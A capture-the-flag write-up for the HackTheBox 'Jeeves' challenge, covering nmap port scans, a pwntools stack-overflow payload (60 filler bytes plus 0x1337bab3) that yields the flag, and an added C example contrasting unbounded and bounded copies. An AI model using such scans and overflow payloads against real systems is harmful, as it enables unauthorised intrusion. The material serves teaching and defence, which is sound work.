Jeeves (HackTheBox): intro to binary exploitation
Given
host
165.227.225.205:31382
challenge description
How are you doing, sir?
a binary file
jeeves
I started by scanning the host
nmap -Pn --min-rate 4500 --max-rtt-timeout 1500ms 165.227.225.205 -p-
analysing the jeeves file
file type
./jeeves: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=18c31354ce48c8d63267a9a807f1799988af27bf, for GNU/Linux 3.2.0, not stripped
strings
gives nothing interesting
jeeves data flow
jeeves run --> asks for name --> prints "hello $name" --> exits
nmap output
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 16:58 EET
Nmap scan report for 165.227.225.205
Host is up (0.17s latency).
Not shown: 65499 filtered ports, 35 closed ports
PORT STATE SERVICE
31251/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 29.74 seconds
one port open
analysing the open port:
nmap -Pn -sC -sV 165.227.225.205 -p31251
output
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-05 17:00 EET
Nmap scan report for 165.227.225.205
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
31251/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Employee File Manager
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.50 seconds
Looking at the Jeeves page on port 31251
it seems the same binary is deployed there
let's try connecting to it with nc
further analysing binary with ghidra
we realise we need 60 bytes of filler ("A" x 60) to reach the variable we want to overwrite
so I used pwntools (instead of plain nc) to send the payload
from pwn import *

# connect straight to the challenge service (pwntools' remote() replaces the nc wrapper;
# nc does not read its host and port from stdin, so process("nc") + sendline would never connect)
target = remote("209.97.187.130", 32259)

# 60 bytes of padding fill the name buffer, then the value that overwrites the target variable
# (pwntools on Python 3 needs bytes, so b"A" rather than "A")
payload = b"A" * 60
payload += p64(0x1337bab3)

target.sendline(payload)
print(target.recvuntil(b"}"))
and we get the flag
flag
HTB{hidden}
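Added example, not the challenge's source and not the write-up's own code: a hypothetical C reconstruction of the bug class behind the 60-byte offset, showing the unbounded copy next to a bounded one. The struct layout, function names and the NAME_LEN buffer size are assumptions; only the 60-byte offset and the 0x1337bab3 value come from the write-up above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_LEN 60
#define MAGIC    0x1337bab3u

/* Hypothetical frame modelled on the write-up, not the challenge's real
 * source: a 60-byte name buffer sits directly below the variable that
 * gates the flag, so bytes 60..63 of an over-long name land in 'gate'. */
struct greeting_frame {
    char     name[NAME_LEN];
    uint32_t gate;
};

/* Vulnerable pattern: the copy length comes from the caller-supplied
 * input, not from the buffer size (what gets() or scanf("%s") do).
 * The loop is capped at the frame size only so the demo stays inside the
 * modelled object; the real bug has no cap and keeps writing past 'gate'.
 * Returns 1 if the overflow overwrote 'gate' with MAGIC. */
int greet_unsafe(const unsigned char *input, size_t len) {
    struct greeting_frame f;
    unsigned char *raw = (unsigned char *)&f;   /* byte view of the frame */

    memset(&f, 0, sizeof f);
    for (size_t i = 0; i < len && i < sizeof f; i++)
        raw[i] = input[i];
    return f.gate == MAGIC;
}

/* Hardened version: the copy is bounded by the destination and the name is
 * always NUL-terminated, so 'gate' can only change through program logic. */
int greet_safe(const unsigned char *input, size_t len) {
    struct greeting_frame f;
    size_t n = len < NAME_LEN - 1 ? len : NAME_LEN - 1;

    memset(&f, 0, sizeof f);
    memcpy(f.name, input, n);
    f.name[n] = '\0';
    return f.gate == MAGIC;
}

/* Constructed sample input mirroring the write-up's payload: 60 filler
 * bytes followed by 0x1337bab3 little-endian (the low 4 bytes of p64). */
static size_t sample_payload(unsigned char *out, size_t cap) {
    if (cap < NAME_LEN + 4)
        return 0;
    memset(out, 'A', NAME_LEN);
    out[NAME_LEN + 0] = 0xb3;
    out[NAME_LEN + 1] = 0xba;
    out[NAME_LEN + 2] = 0x37;
    out[NAME_LEN + 3] = 0x13;
    return NAME_LEN + 4;
}

/* Feeds the same over-long input to the unbounded reader; returns 1 if it opened the gate. */
int unsafe_gate_opens(void) {
    unsigned char p[NAME_LEN + 4];
    size_t n = sample_payload(p, sizeof p);
    return greet_unsafe(p, n);
}

/* Same input to the bounded reader; returns 0 because the extra bytes are dropped. */
int safe_gate_opens(void) {
    unsigned char p[NAME_LEN + 4];
    size_t n = sample_payload(p, sizeof p);
    return greet_safe(p, n);
}

int main(void) {
    printf("unbounded copy, gate reached: %d\n", unsafe_gate_opens());   /* 1 */
    printf("bounded copy,   gate reached: %d\n", safe_gate_opens());     /* 0 */
    return 0;
}
```

The fix is the one Ghidra makes obvious once the layout is known: size the copy by the destination, not by whatever arrives on the socket. Compiling the real binary with stack protector and FORTIFY_SOURCE would also have turned this silent overwrite into an abort.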
#easy #binary